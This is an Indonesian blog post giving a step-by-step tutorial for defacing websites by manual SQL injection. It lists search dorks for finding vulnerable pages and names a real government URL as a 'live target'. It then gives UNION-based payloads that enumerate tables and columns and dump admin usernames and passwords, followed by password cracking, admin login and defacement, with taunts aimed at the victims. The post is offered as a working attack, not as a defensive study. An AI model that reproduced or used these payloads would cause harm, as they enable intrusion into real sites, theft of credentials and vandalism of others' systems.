Deface Metode SQL Injection Manual with Dios

Deface Metode SQL Injection Manual with Dios

Assalamualaikum w.r w.b
Bertemu lagi dengan gua Mr.D4NCO yang Gans :v
Kali ini gua akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe

[Langkah 1]

Bahan - Bahan
1. Internet cuy yakali kaga pake internet
2. Dork :
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
3.Web yg vuln sql injection
    *disini saya ada live target :
http://www.setjen.kemendagri.go.id/news_detail.php?id=10

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
target.com/berita.php?id=10'

sehingga muncul pesan error seperti berikut :
Warning: mysql_fetch_assoc()
Warning: mysql_fetch_array()
Warning: mysql_num_rows()
Warning: session_start()
atau yang semacam/serupa dan sebentuk atau seperti di atas


Pertama tama kalian cari web vuln dulu pake dork yang di atas ya  ajg kembangin pake otak lu biar dpt yg mantep :v

[Langkah 2]

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
target.com/berita.php?id=-10+order+by+1-- atau
target.com/berita.php?id=-10+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:
target.com/berita.php?id=-10+order+by+1--
target.com/berita.php?id=-10+order+by+2--
target.com/berita.php?id=-10+order+by+3--
target.com/berita.php?id=-10+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: target.com/berita.php?id=-10+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi target.com/berita.php?id=-10+order+by+8--

[Langkah 3]

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: target.com/berita.php?id=-10+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: target.com/berita.php?id=-10+union+select+1,2,3,4,version(),6,7,8-- atau
target.com/berita.php?id=-10+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

[Langkah 4]

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:
target.com/berita.php?id=-10+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"
😃

[Langkah 5]

untuk menamplikan semua isi dari table tsb adalah
perintahzg group_concat(table_name) >>> dimasukan padaaa angkaak yg keluar tadik
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angkaax terakhir

target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--


[Langkah 6]

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+informatioan_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir

target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--


[Langkah 7]

memunculkan apa yg tadi telah dikeluarkanbdh dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluarfr tadi
perintah +from+(nama tablee berasal) >>> dimasukan setelahgh angka terakhir

Contoh :
target.com/berita.php?id=-10+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalash id,username,password

Contoh-:-
target.com/berita.php?id=-10+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--


[Langkah 8]

tahaaahp terakhir tinggal crack passwordnya (kalo perlu), terus cari admin loginynha >> tebass 3:)


Tebas web nya biar mampus tuh orang wkwk sad :v

Contoh hasil punya gua ;

Ok segitu aja tutor dri gua klo kurang jelas atau blom ngerti komen aja di bawah pasti gua respon, jangan lupa klo mau nyari gua ada di gc Smiley Face Official nick gua Mr.D4NCO. 

2 comments for "Deface Metode SQL Injection Manual with Dios"

Post a Comment